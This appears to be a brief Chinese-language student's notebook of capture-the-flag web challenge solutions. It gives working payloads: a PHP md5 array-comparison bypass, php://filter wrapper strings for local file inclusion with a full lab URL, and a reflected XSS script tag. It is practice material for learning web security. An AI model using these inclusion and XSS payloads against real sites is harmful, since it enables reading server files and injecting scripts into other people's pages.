CTF-1-5題筆記

POST

put me a message

ZmxhZ3twdXRfcmVxdWVzdHVoMjEyMzJ9 base64解碼

 

F12

查看頁面源代碼和請求包頭拼湊成flag

Code~md5

得到php代碼 輸入參數v1[]=1&&v2[]=2&&v3[]

得到flag

Include

重點難點對我而言

查看include1.php

 

構造偽協議

php://filter/read=convert.base64-encode/resource=include1(//注意不用加后綴.php)

解碼知道include1過濾了flag,但有提示include2

再重新看include2解碼發現沒有過濾flag

構造偽協議 但要用rot13並且是include2下而非include1

php://filter/read=string.rot13/resource=flag

得到flag

 

 

http://192.144.182.32:8001/abf20c91a442da48/2/include2.php?file=php://filter/read=string.rot13/resource=flag

 

XSS

這個好像沒有設置過濾，直接輸入"><script>alert('XSS');</script>就繞過了

獲得Key

Md5解碼

 

"><script>alert('XSS');</script>

 

進行md5解密

 

心得：通過做題更加深刻理解這些方法。今天搞了好久第六題沒搞懂啊，各種大小寫，雙寫，畸形，.htaccess還是不行啊，提示沒搞懂，靠。黑名單我特么都搞不來，菜！！！